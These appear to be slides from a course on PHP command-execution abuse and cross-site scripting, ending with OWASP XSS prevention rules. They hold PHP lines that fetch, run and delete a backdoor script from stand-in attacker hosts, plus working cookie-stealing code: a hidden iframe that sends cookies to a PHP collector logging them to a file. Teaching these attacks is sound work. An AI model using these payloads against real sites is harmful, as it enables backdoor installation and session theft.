PHP Exploit

spew out spam

Section 28

PHP

le langage de script côté serveur le plus populaire

Possibilité d’exécuter des programmes systèmes:

- exec

- System

- Passthru

- Shell-exec

Utilisateur mal intentionné

Démo

Utilisateur mal intentionné

<?php
passthru(’cd /tmp;wget http:/badguy.org/data/backdoor.txt;perl backdoor.txt;rm -f backdoor.txt*’);
passthru(’cd /tmp;curl -O http:/badguy.org/data/backdoor.txt;perl backdoor.txt;rm -f backdoor.txt*’);
system(’cd /tmp;wget http:/badguy.org/data/backdoor.txt;perl backdoor.txt;rm -f backdoor.txt*’);
system(’cd /tmp;curl -O http:/badguy.org/data/backdoor.txt;perl backdoor.txt;rm -f backdoor.txt*’);
exec(’cd /tmp;wget http:/badguy.org/ data/backdoor.txt;rm -f backdoor.txt*’);
exec(’cd /tmp;curl -O http:/badguy.org/ data/backdoor.txt;perl backdoor.txt;rm -f backdoor.txt*’);
shell_exec(’cd /tmp;wget http:/badguy.org/data/backdoor.txt;perl backdoor.txt;rm -f backdoor.txt*’);
shell_exec(’cd /tmp;curl -O http:/badguy.org/data/backdoor.txt;perl backdoor.txt;rm -f backdoor.txt*’);
?>

Administrateur mal intentionné

Démo

Administrateur mal intentionné

passthru( \"cd /tmp; wget https://hackserver.com/scripts/emailer_pl; perl emailer_pl; rm emailer_pl*\"

XSS

Cross-site scripting

Section 28

Two types XSS

• Persistant
• No Persistant

No Persistant

XSS Persistant

Samy is my hero

How to steal a Cookie ?

<!DOCTYPE html>
<html lang="en">

<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<meta http-equiv="X-UA-Compatible" content="ie=edge">
	<title>Document</title>
</head>
<body>
	<h1>Welcome ;)</h1>
	<script>
		document.cookie = "name=johnny da costa";
		document.cookie = "sessionKey=6a204bd89f3c8348afd5c77c717a097a";
	</script>
</body>
</html>

Page who manage the cookies

...
    //Include our stealcookie page in the webpage with the component "iframe"
    function createIFRAME() {
	//create a iframe element
	var x = document.createElement("IFRAME");
	//select the target source (our stealcookie page)
	x.setAttribute(
           "src", 
           "http://localhost:8080/28security/stealcookie.php?cookie=" + document.cookie
        );
	//the user can't see the website including.
	x.style.visibility = "hidden";
	//include the website to the body
	document.body.appendChild(x);
    }
    createIFRAME();
...

Malicious script that dump the cookie's user

<?php

//get the value from the method GET sended by the victim
$cookie = $_GET['cookie'];

//we open( or create if the file doesn't exit) a file to append the cookie
$myfile = fopen("cookie.txt", "a") or die("Unable to open file!");
fwrite($myfile, $cookie. PHP_EOL);
fclose($myfile);

Get and write the cookie's user to a file

How to protect yourself

from attack xss ?

Prevention Rules

RULE #0 - Never Insert Untrusted Data Except in Allowed Locations

RULE #1 - HTML Escape Before Inserting Untrusted Data into HTML Element Content

RULE #2 - Attribute Escape Before Inserting Untrusted Data into HTML Common Attributes

RULE #3 - JavaScript Escape Before Inserting Untrusted Data into JavaScript Data Values

RULE #4 - URL Escape Before Inserting Untrusted Data into HTML URL Parameter Values

Source : OWASP